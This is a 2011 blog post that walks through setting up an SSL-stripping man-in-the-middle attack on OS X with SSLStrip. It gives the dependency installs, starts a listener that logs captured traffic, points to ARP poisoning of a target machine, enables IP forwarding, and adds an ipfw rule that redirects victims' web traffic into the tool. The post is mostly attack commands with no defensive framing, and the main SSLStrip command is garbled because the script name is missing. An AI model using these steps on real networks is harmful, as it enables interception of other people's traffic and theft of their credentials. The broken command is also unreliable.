Wednesday, January 5, 2011

SSL stripping on OS X with SSLStrip

SSLStrip tool provides a demonstration of the HTTPS stripping attacks - you can download it from here.

Then on OS X 10.6.5 with MacPorts we need to install following dependancies.

1. $ sudo port selfupdate

2. $ sudo port install py25-twisted-web2

3. $ sudo port install py25-socket-ssl

4. $ sudo port install py25-openssl

Now, run the following from the SSLStrip home directory.

$ sudo python -l 9090 -w captured.log

This will start SSLStrip listening on port 9090 - and will write all captured traffic in to the captured.log

Now starts the interesting part.. We need to make the traffic from our target machine goes through SSLStrip. To do that first we need to make sure the traffic flows through our machine. That we can do by ARP poisoning target machine. My previous blog post explains how to do that. Once that is done - we need to forward all that incoming traffic to port where SSLStrip running.

Enable IP forwarding on MAC.

$ sudo sysctl -w net.inet.ip.forwarding=1
$ sudo sysctl -w net.inet.ip.fw.verbose=1

Now we need to add a rule to IPFW to redirect traffic to the port SSLStrip is running.

$ sudo ipfw add fwd,9090 log tcp from not me to any 80